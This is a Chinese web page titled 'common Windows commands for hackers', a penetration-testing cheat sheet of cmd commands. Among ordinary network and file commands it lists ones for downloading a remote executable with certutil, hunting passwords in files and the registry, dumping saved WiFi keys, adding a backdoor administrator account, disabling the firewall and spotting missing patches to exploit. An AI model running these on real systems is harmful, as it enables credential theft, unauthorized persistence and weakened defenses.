您当前的位置:首页 > 电脑百科 > 安全防护 > 软件工具

黑客常用Windows命令笔记

时间:2019-12-30 11:55:31  来源:  作者:
「渗透基础」-黑客常用Windows命令笔记

 

如果我有七个小时的时间来砍树,那么我一定会花6个小时来磨我的斧头!

 

渗透命令:

certutil-----从远程url下载文件

案例:certutil -urlcache -split -f http://baidu.com/test.exe

 

findstr-----查找文件后缀结果

findstr /s /i "pass" *.py*

reg query HKLM /f password /t REG_SZ /s-----搜集注册表中的各种密码数据

 

查看有没有开启远程链接,运行下面命令:

REG QUERY "HKEY_LOCAL_macHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections

结果:1表示关闭,0表示开启

 

快速查找未打补丁的exp

systeminfo>bzhack.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type bzhack.txt|@find /i "%i"|| @echo %i you can exp)&del /f /q /a bzhack.txt

 

常用命令:

ipconfig/all-----网络配置情况

ipconfig /displayDNS-----查看本地DNS缓存

netsh wlan show profile-----查看连接过的 wifi 名

netsh wlan show profile WiFi-name key=clear 获取 wifi 对应的的密码

query user-----查当前机器中正在线的用户,看管理员在不在

net view------显示域列表/计算机列表

net user------查看当前所有账号,判断域规模

net group-----查看当前域所有的组名

net user bzhack pass /add-----增加用户

net user bzhack /del-----删除用户

net Localgroup-----添加、显示本地组

net localgroup administrators bzhack /add-----将bzhack加入管理员组

net share----- 查看当前机器开启的共享

 

文件操作:

md-----建文件夹

rd-----删除文件夹

tree-----显示文件夹结构

dir-----显示磁盘目录内容

copy-----复制文件

Xcopy-----copy加强版,复制文件夹

del-----删除文件

ren-----[原文件/夹名][新文件/夹名]修改文件名

type-----查看文本内容

dir /a /s /b d:"*.conf"-----搜索d盘里conf结尾的文件

edit-----文本编辑

type-----显示文件内容

 

网络命令:

netstat -a----- 列出所有端口

netstat -p----- 显示 PID 和进程名称

netstat -r----- 显示核心路由信息

netstat -at-----列出所有tcp连接

netstat -au-----列出所有ucp连接

netstat -an |find "3389" 查看开启3389端口的信息

netstat -ano | findstr "ESTABLISHED" 查看当前正处于连接状态的端口及ip

netstat -ano | findstr "LISTENING" 查看当前正处于监听状态的端口及ip

其他命令

ver-----查看版本

hostname-----查看机器名

whoami-----查看权限

systeminfo-----查看配置

tasklist-----查看进程

cls-----清屏

net start-----查看开启的服务,比如Terminal Services 远程连接服务

net stop sharedaccess-----关闭防火墙

set-----查看当前机器的环境变量,看有没有我们可以直接利用到的语言环境

fsutil fsinfo drives-----列出当前机器上的所有盘符



Tags:Windows命令   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
安装Set-ExecutionPolicy RemoteSigned -scope CurrentUseriwr -useb get.scoop.sh | iex 测试安装是否成功scoop 查找软件scoop search git安装软件scoop install git关于...【详细内容】
2021-12-03  Tags: Windows命令  点击:(25)  评论:(0)  加入收藏
如果我有七个小时的时间来砍树,那么我一定会花6个小时来磨我的斧头! 渗透命令:certutil-----从远程url下载文件案例:certutil -urlcache -split -f http://baidu.com/test.exe...【详细内容】
2019-12-30  Tags: Windows命令  点击:(96)  评论:(0)  加入收藏
在实际的网络应用中,我们可能会遇到这样的网络环境,上外网我们使用的无线网络,内网我们使用的是有限网卡。在设置完成后会出现外网和内网的访问非常不稳定。需要经常使用网络诊...【详细内容】
2019-12-12  Tags: Windows命令  点击:(199)  评论:(0)  加入收藏
在实际的网络应用中,我们可能会遇到这样的网络环境,上外网我们使用的无线网络,内网我们使用的是有限网卡。在设置完成后会出现外网和内网的访问非常不稳定。需要经常使用网络诊...【详细内容】
2019-12-12  Tags: Windows命令  点击:(87)  评论:(0)  加入收藏
随着Windows操作系统的不断升级,界面越来越图形界面化,但对于使用Windows操作系统的用户来说,掌握一些常用的CMD命令可以解决日常应用中的一些问题。DOS的命令虽然界面简陋,但在...【详细内容】
2019-12-10  Tags: Windows命令  点击:(158)  评论:(0)  加入收藏
▌简易百科推荐
已经观察到一种新的基于JavaScript的远程访问木马(RAT)利用社会工程学传播,采用隐蔽的"无文件"技术作为其逃避检测和分析的方法。该恶意软件由Prevalyion的对抗性反情报团队(PA...【详细内容】
2021-12-17  网安老葫    Tags:恶意软件   点击:(13)  评论:(0)  加入收藏
关于windows Defender防病毒的问题升级win10后,我们会经常遇到打开或下载文件时弹出提示框提示你下载的文件是病毒之类,直接给你删除。你好不容易找了个激活工具,你刚打开发现...【详细内容】
2021-11-08  IT小哥吧    Tags:defender   点击:(47)  评论:(0)  加入收藏
喽!大家好,我是小易,欢迎来到我的知识分享站!今天给大家分享5个杀毒神器,让你的电脑干干净净,建议收藏起来哟! 1、Windows Defender随着Win10系统的更新已经日趋完善,它可以很好的解...【详细内容】
2021-11-08  知识与技能    Tags:流氓软件   点击:(74)  评论:(0)  加入收藏
介绍其实Iptables服务不是真正的防火墙,只是用来定义防火墙规则功能的"防火墙管理工具",将定义好的规则交由内核中的netfilter即网络过滤器来读取,从而真正实现防火墙功能。fil...【详细内容】
2021-10-18  互联网IT技术全栈    Tags:   点击:(52)  评论:(0)  加入收藏
什么是Nessus?Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件步骤如下:查看当前kali系统内核版本...【详细内容】
2021-09-09  TestGO    Tags:Nessus   点击:(112)  评论:(0)  加入收藏
http 头部信息http头部信息经常包含着主机服务的一些版本信息,经常使用的字段信息有:Server, X-Powered-By, X-AspNet-Version工具可采用curl进行curl --location --head $URL...【详细内容】
2021-08-19  80后IT老民工    Tags:渗透   点击:(227)  评论:(0)  加入收藏
一、杀软常见的三种方式二、免杀的三种常用方式三、利用工具实现免杀1、veil工具基础实现免杀+进阶2、venom免杀3、利用kali自带的shellter进行免杀4、利用avet实现免杀四、...【详细内容】
2021-08-18  白帽hacker淬炼    Tags:免杀   点击:(82)  评论:(0)  加入收藏
关于工具现有工具现在,现成的污点分析工具已经有很多了。其中,我最感兴趣的是Triton和bincat,因为两者已经相当成熟。然而,我们却无法使用这两种工具,因为它们不支持目标设备所...【详细内容】
2021-08-12  Hbo涵    Tags:安全漏洞   点击:(94)  评论:(0)  加入收藏
从实现原理上分,防火墙的技术包括四大类:网络级防火墙、应用级网关、电路级网关和规则检查防火墙。1、网络级防火墙一般是基于源地址和目的地址、应用、协议以及每个IP包的端...【详细内容】
2021-07-20  趣谈文化  搜狐号  Tags:防火墙   点击:(225)  评论:(0)  加入收藏
一、VMware部分1、Vmware简介虚拟机就是一个用来模拟真实的物理机环境的一个软件,可以在虚拟机中安装不同版本的操作系统。就是一个把下载好的ISO安装在物理机操作系统的一个...【详细内容】
2021-07-12  Kali与编程  公众号  Tags:Kali Linux   点击:(113)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条